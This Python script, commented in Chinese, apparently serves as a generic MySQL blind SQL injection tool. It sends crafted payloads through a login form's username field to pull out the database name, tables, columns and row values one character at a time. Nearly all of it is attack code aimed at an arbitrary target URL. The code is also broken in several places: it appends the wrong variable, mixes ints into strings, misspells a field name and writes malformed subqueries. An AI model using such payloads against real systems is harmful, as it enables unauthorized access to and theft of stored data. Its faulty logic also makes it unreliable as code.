import requests import string #mysql 手动注入 通用脚本 适用盲注 可以跟具自己的需求更改 def home(): url="url" list=string.digits+string.letters+"!@#$%^&*()_+{}-=<>,./?" s=requests.session() success = "" # 成功返回的特征 error="" #失败返回的体征 # 1.拿到当前连接数据库长度 leng=0 i=0 while True: sql="admin%1$\\' or length(database())>"+str(i)+"#" data={"username":sql,"passwrod":1} r=s.post(url,data=data).content if error in r : leng=i i=0 break i+=1 print ("length the database:%d" %leng) #2.拿到当前连接数据库名 strs='' for t in range(leng): for l in list: sql="admin%1$\\' or ascii(substr(database(),"+str(t)+",1))="+str(ord(l))+"#" data = {"username": sql, "passwrod": 1} r=s.post(url,data=data).content if success in r: strs+=strs break print("database is :%s" % (strs)) #3.拿当前数据库里面的所有表 #拿到数据库表添加的长度 while True: sql="admin%1$\\' or select length(group_concat(table_name)) from information_schema.tables where table_type='base table' and table_schema=database()<"+i+"#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if error in r: leng=i i=0 break i+=1 print("length table is :%s" % (leng)) #返回所有表 for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select group_concat(table_name) from information_schema.tables where table_type='base table' and table_schema=database(),"+str(t)+",1))="+str(ord(l))+"#" data = {"username": sql, "passwrod": 1} r=s.post(url,data=data).content if success in r: strs+=strs break print("talbes is :%s" % (strs)) #4.选择先要查询的表 返回表所有字段 #返回长度 table='table'#要查找的表名 tablename = '0x' + table.encode('hex') table_name = table while True: sql = "admin%1$\\' or select length(group_concat(column_name)) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()<" + i + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if error in r: leng = i i = 0 break i += 1 print("length table is :%s" % (leng)) # 返回所有表 for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()," + str( t) + ",1))=" + str(ord(l)) + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if success in r: strs += strs break print("talbes is :%s" % (strs)) # 5.返回相应字段里面的值 num=0 while True: sql = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#" data = {'username':sql,'password':1} r = s.post(url,data=data).content if error in r: num = i i=0 break i+=1 pass print("[+]number(column): %d" %(num)) # 返回长度 table = 'table' # 要查找的表名 col='user'#要返回的字段 for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select "+col+" from limit 0,1 "+table_name+","+str(t)+",1))=" + str(ord(l)) + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if success in r: strs += strs break print("talbes is :%s" % (strs))